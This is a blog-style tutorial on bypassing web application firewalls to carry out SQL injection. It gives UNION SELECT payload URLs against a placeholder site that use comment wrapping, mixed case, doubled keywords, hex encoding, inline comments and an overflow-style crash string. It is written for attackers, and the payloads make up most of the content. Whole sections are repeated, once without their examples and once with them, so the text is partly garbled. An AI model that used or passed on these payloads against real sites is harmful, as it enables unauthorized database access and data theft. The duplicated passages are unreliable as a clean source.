Basic Of Advanced WAF Bypassing Methods
Assalam 0 Alikum
Dear
...:::Friends & Visiters:::...
![[Image: firewall.png]](http://www.ossramblings.com/files/images/firewall.png)
What is WAF ?
WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections!
Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example: (m) or
|)
Basic/Simple Methods:
First, of course, we need to know the Basic Methods to bypass WAF…
1) Comments:
You can use comments to bypass WAF:
However, most WAF identify this method so they still show a “Forbidden” Error…
2) Change the Case of the Letters:
You can also change the Case of the Command:
However, as before, this trick is also detected by most WAF!
3) Combine the previous Methods:
What you can also do is to combine the previous two methods:
This method is not detectable by many Web Application Firewalls!
What is WAF ?
WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections!
Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example: (m) or
|)http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
(We get a 403 Error!)Basic/Simple Methods:
First, of course, we need to know the Basic Methods to bypass WAF…
1) Comments:
You can use comments to bypass WAF:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
(First Method that can Bypass WAF)However, most WAF identify this method so they still show a “Forbidden” Error…
2) Change the Case of the Letters:
You can also change the Case of the Command:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
(Another Basic Method to Bypass WAF!)However, as before, this trick is also detected by most WAF!
3) Combine the previous Methods:
What you can also do is to combine the previous two methods:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….This method is not detectable by many Web Application Firewalls!
4) Replaced Keywords:
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT” :-D )This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!
5) Inline Comments:
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
(The %55 is equal to “U” and %53 to “S”. See more on the Advanced Section….)I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…
Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!
http://www.site.com/index.php?page_id=-15+and+(select
1)=(Select 0xAA[..(add about 1000
"A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….(( You can test if the WAF can be crashed by typing:
? (hug)page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
If you get a 500, you can exploit it using the Buffer Overflow Method! ))
2) Replace Characters with their HEX Values:
We can replace some characters with their HEX (URL-Encoded) Values.
Example:
http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
(which means “union select”)Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):
http://www.swingnote.com/tools/texttohex.php
3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
[+] In addition to the previous example, some other bypasses might be:
3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
Code:
@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()
Learning MySQL Really helps on such issues! ;-)4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…
(If the Firewall removes the “*”, the result will be: 15+union+select….)
So, if you find such a silly function, you can exploit it, in this way! :-D[+] In addition to the previous example, some other bypasses might be:
Code:
-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…) If You Need Any Kind Help, Reply Here 
Muhammad Shahbaz (17 Years Old) is a Young blogger, SEO Expert, & Cyber Security Expert from Pakistan
0 Comments:
Post a Comment
If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.
Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!
Thanks for reading,
Administrator Of FOCSoft